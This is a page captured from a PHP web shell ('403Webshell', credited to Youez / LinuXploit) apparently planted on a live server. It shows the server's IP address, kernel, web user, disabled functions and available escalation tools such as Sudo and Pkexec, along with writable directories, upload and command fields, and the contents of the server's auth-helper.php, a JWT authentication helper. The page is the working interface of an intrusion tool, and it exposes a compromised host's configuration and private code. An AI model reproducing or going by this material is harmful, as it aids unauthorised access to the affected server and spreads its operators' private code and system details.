403Webshell
Server IP : 158.247.231.215  /  Your IP : 216.73.217.84
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux CTMS 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /mnt/blockstorage/ctms/api/custom-api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /mnt/blockstorage/ctms/api/custom-api/auth-helper.php
<?php
/**
 * JWT Authentication Helper
 * Provides JWT token verification for API endpoints
 */

/**
 * Verify JWT token and authenticate user
 * Returns user_id if valid, false otherwise
 */
function verify_jwt_token() {
    $auth_header = isset($_SERVER['HTTP_AUTHORIZATION']) ? $_SERVER['HTTP_AUTHORIZATION'] : '';

    if (empty($auth_header) && function_exists('apache_request_headers')) {
        $headers = apache_request_headers();
        $auth_header = isset($headers['Authorization']) ? $headers['Authorization'] : '';
    }

    if (empty($auth_header)) {
        return false;
    }

    if (preg_match('/Bearer\s+(.+)/i', $auth_header, $matches)) {
        $token = $matches[1];
    } else {
        return false;
    }

    $secret_key = defined('JWT_AUTH_SECRET_KEY') ? JWT_AUTH_SECRET_KEY : false;

    if (!$secret_key) {
        return false;
    }

    try {
        $token_parts = explode('.', $token);
        if (count($token_parts) !== 3) {
            return false;
        }

        list($header, $payload, $signature) = $token_parts;

        $valid_signature = hash_hmac('sha256', "$header.$payload", $secret_key, true);
        $valid_signature = rtrim(strtr(base64_encode($valid_signature), '+/', '-_'), '=');

        if ($signature !== $valid_signature) {
            return false;
        }

        $payload_data = json_decode(base64_decode(strtr($payload, '-_', '+/')), true);

        if (!$payload_data || !isset($payload_data['data']['user']['id'])) {
            return false;
        }

        if (isset($payload_data['exp']) && $payload_data['exp'] < time()) {
            return false;
        }

        $user_id = $payload_data['data']['user']['id'];
        $user = get_user_by('id', $user_id);

        if (!$user) {
            return false;
        }

        wp_set_current_user($user_id);
        return $user_id;

    } catch (Exception $e) {
        return false;
    }
}

/**
 * Send JSON response
 */
function send_json_response($data, $status_code = 200) {
    http_response_code($status_code);
    echo json_encode($data);
    exit;
}

/**
 * Send error response
 */
function send_error_response($message, $status_code = 400) {
    send_json_response(array(
        'success' => false,
        'message' => $message
    ), $status_code);
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit